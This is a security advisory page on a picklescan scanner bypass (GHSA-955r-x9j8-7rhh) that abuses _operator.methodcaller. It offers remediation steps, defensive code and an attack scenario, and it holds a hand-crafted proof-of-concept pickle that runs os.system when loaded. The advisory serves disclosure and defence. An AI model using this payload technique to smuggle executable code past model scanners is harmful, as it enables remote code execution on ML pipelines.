Picklescan, the de facto ML model security scanner for PyTorch, can be bypassed using a crafted pickle payload leveraging _operator.methodcaller — meaning any model scan returning 'clean' is untrustworthy until you upgrade to v0.0.34. If your MLOps pipeline uses picklescan as a security gate before loading external models, assume that gate is currently defeated. Patch immediately and treat any externally-sourced model loaded in the past 90 days as suspect.
Risk Assessment
HIGH. The vulnerability undermines a security control, not just a feature, creating false confidence in teams that use picklescan as their primary defense against malicious ML models. Exploitability is moderate: the attacker must understand pickle internals well enough to hand-craft the payload (there is no pickle.dumps shortcut), but a working PoC is publicly available. Exposure is high because picklescan is deployed in PyTorch/MLOps workflows precisely by security-conscious organizations with model-loading pipelines, so the victims are the teams that had already adopted scanning.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| picklescan | pip | < 0.0.34 | 0.0.34 |
If you run any picklescan version below 0.0.34, you are affected.
Recommended Action
6 steps:
1. PATCH: Upgrade picklescan to >= 0.0.34 immediately; this is a one-line change in requirements.txt or Pipfile.
2. VERIFY: Audit which pipelines use picklescan and confirm the patched version is actually deployed, not a cached older version in a Docker layer.
3. DEFENSE-IN-DEPTH: Migrate model serialization to the SafeTensors format (Hugging Face), which does not use pickle and eliminates this class of attack surface entirely.
4. SANDBOX: Run all pickle.load() calls inside isolated containers or VMs with no network egress and minimal filesystem access; treat model loading as untrusted code execution.
5. DETECT: Add egress monitoring on training and inference hosts for unexpected outbound connections during model loading.
6. POLICY: Enforce model provenance controls: load models only from cryptographically signed, internally approved sources, and block direct downloads from public hubs into production.
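For the VERIFY step, a runtime guard can fail a pipeline before it trusts scan results from an unpatched install. A minimal sketch, assuming simple X.Y.Z version strings; the helper functions below are illustrative and not part of picklescan's API:

```python
from importlib.metadata import PackageNotFoundError, version


def parse_version(v: str) -> tuple:
    """Parse a simple 'X.Y.Z' version string into a comparable tuple."""
    return tuple(int(part) for part in v.split(".")[:3])


def picklescan_is_patched(minimum: str = "0.0.34") -> bool:
    """Return True only if an installed picklescan meets the patched version."""
    try:
        installed = version("picklescan")
    except PackageNotFoundError:
        return False  # not installed at all: fail closed
    return parse_version(installed) >= parse_version(minimum)


# Example gate for a CI step:
# if not picklescan_is_patched():
#     raise RuntimeError("picklescan < 0.0.34: scan results untrustworthy")
```

Running this check inside the container image that actually loads models (rather than only in CI) also catches the cached-Docker-layer case from step 2.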
Frequently Asked Questions
What is GHSA-955r-x9j8-7rhh?
Picklescan, the de facto ML model security scanner for PyTorch, can be bypassed using a crafted pickle payload leveraging _operator.methodcaller — meaning any model scan returning 'clean' is untrustworthy until you upgrade to v0.0.34. If your MLOps pipeline uses picklescan as a security gate before loading external models, assume that gate is currently defeated. Patch immediately and treat any externally-sourced model loaded in the past 90 days as suspect.
Is GHSA-955r-x9j8-7rhh actively exploited?
No confirmed active exploitation of GHSA-955r-x9j8-7rhh has been reported, but organizations should still patch proactively.
How to fix GHSA-955r-x9j8-7rhh?
1. PATCH: Upgrade picklescan to >= 0.0.34 immediately; this is a one-line change in requirements.txt or Pipfile.
2. VERIFY: Audit which pipelines use picklescan and confirm the patched version is actually deployed, not a cached older version in a Docker layer.
3. DEFENSE-IN-DEPTH: Migrate model serialization to the SafeTensors format (Hugging Face), which does not use pickle and eliminates this class of attack surface entirely.
4. SANDBOX: Run all pickle.load() calls inside isolated containers or VMs with no network egress and minimal filesystem access; treat model loading as untrusted code execution.
5. DETECT: Add egress monitoring on training and inference hosts for unexpected outbound connections during model loading.
6. POLICY: Enforce model provenance controls: load models only from cryptographically signed, internally approved sources, and block direct downloads from public hubs into production.
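Complementing the sandbox step, Python's own pickle documentation recommends restricting `Unpickler.find_class` to an explicit allowlist, so no global is ever resolved unless you opted it in. A minimal sketch; the allowlist contents are illustrative and must be extended with the globals your models actually require:

```python
import io
import pickle

# Illustrative allowlist: extend with the (module, name) pairs your models need.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any global not explicitly allowlisted."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads with an allowlist enforced."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

A payload that references `_operator.methodcaller` (or `builtins.__import__`) is rejected inside `find_class` before anything executes, while plain containers that need no globals still load normally. This is a deny-by-default layer, not a replacement for patching the scanner.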
What systems are affected by GHSA-955r-x9j8-7rhh?
This vulnerability affects the following AI/ML architecture patterns: Training pipelines, Model serving, MLOps pipelines, Model registries, CI/CD for ML.
What is the CVSS score for GHSA-955r-x9j8-7rhh?
No CVSS score has been assigned yet.
Technical Details
NVD Description
### Summary
Picklescan can be bypassed with a payload built around `_operator.methodcaller`, a built-in Python library function, to execute code from remote pickle files.

### Details
The attack proceeds in the following steps:
- The attacker crafts a payload that calls the `_operator.methodcaller` function from the pickle's reduce step.
- The victim checks the pickle file with the picklescan library, which does not detect any dangerous functions.
- The victim then calls `pickle.load()` on the malicious pickle file, leading to remote code execution.

### PoC
```python
import pickle
import pickletools

opcode2 = b'''cbuiltins
__import__
(Vos
tRp0
0c_operator
methodcaller
(Vsystem
Vecho "pwned by _operator.methodcaller"
tR(g0
tR.'''

pickletools.dis(opcode2)
pickle.loads(opcode2)
```

This PoC cannot easily be created with pickle.dumps, so it was built by hand.

### Impact
Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models is affected. Attackers can embed malicious code in a pickle file that remains undetected by the scanner but executes when the file is loaded, and can distribute infected pickle files across ML models, APIs, or saved Python objects.

### Credit
Reported by Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, and Guanheng Liu (coolwind326@gmail.com).
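To see why a scanner has to reason at the opcode level, the sketch below statically lists every global a protocol-0/1 pickle stream would resolve, without ever loading it (`pickletools.genops` only disassembles). This is illustrative and is not picklescan's actual implementation or denylist:

```python
import pickletools


def imported_globals(payload: bytes):
    """Statically list the globals a pickle stream resolves, without loading it."""
    found = []
    for opcode, arg, _pos in pickletools.genops(payload):
        if opcode.name == "GLOBAL":
            # Protocol 0/1: pickletools reports the arg as "module name".
            found.append(tuple(arg.split(" ", 1)))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+: module/name come from the stack; flag for review.
            found.append(("<stack>", "<stack>"))
    return found


# The PoC payload from the advisory, disassembled only (never pickle.loads'ed):
poc = (
    b'cbuiltins\n__import__\n'
    b'(Vos\ntRp0\n0'
    b'c_operator\nmethodcaller\n'
    b'(Vsystem\nVecho "pwned by _operator.methodcaller"\n'
    b'tR(g0\ntR.'
)
```

Disassembling `poc` surfaces both `builtins.__import__` and `_operator.methodcaller`; the bypass worked because the scanner's pre-0.0.34 denylist did not treat `_operator.methodcaller` as dangerous, not because the import was hidden from the opcode stream.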
Exploitation Scenario
An adversary targeting an ML team at a financial institution crafts a malicious PyTorch model containing the _operator.methodcaller payload — a reverse shell or credential harvester — embedded in the pickle bytecode. They publish it to a public model hub under a convincing model name (e.g., a fine-tuned LLM for finance). The target team's MLOps pipeline automatically pulls the model, runs picklescan (returns clean), and loads it into their inference server. On pickle.load(), the payload executes, establishing a reverse shell from the inference server — which has IAM roles, database credentials, and internal network access — to the attacker's C2. The entire attack chain is invisible to the security scanner the team trusted.
Related Vulnerabilities
- GHSA-vvpj-8cmc-gx39 (10.0): picklescan: security flaw enables exploitation (same package: picklescan)
- GHSA-g38g-8gr9-h9xp (9.8): picklescan: Allowlist Bypass evades input filtering (same package: picklescan)
- GHSA-7wx9-6375-f5wh (9.8): picklescan: Allowlist Bypass evades input filtering (same package: picklescan)
- CVE-2025-1945 (9.8): picklescan: ZIP flag bypass enables RCE in PyTorch models (same package: picklescan)
- GHSA-hgrh-qx5j-jfwx (8.8): picklescan: Protection Bypass circumvents security controls (same package: picklescan)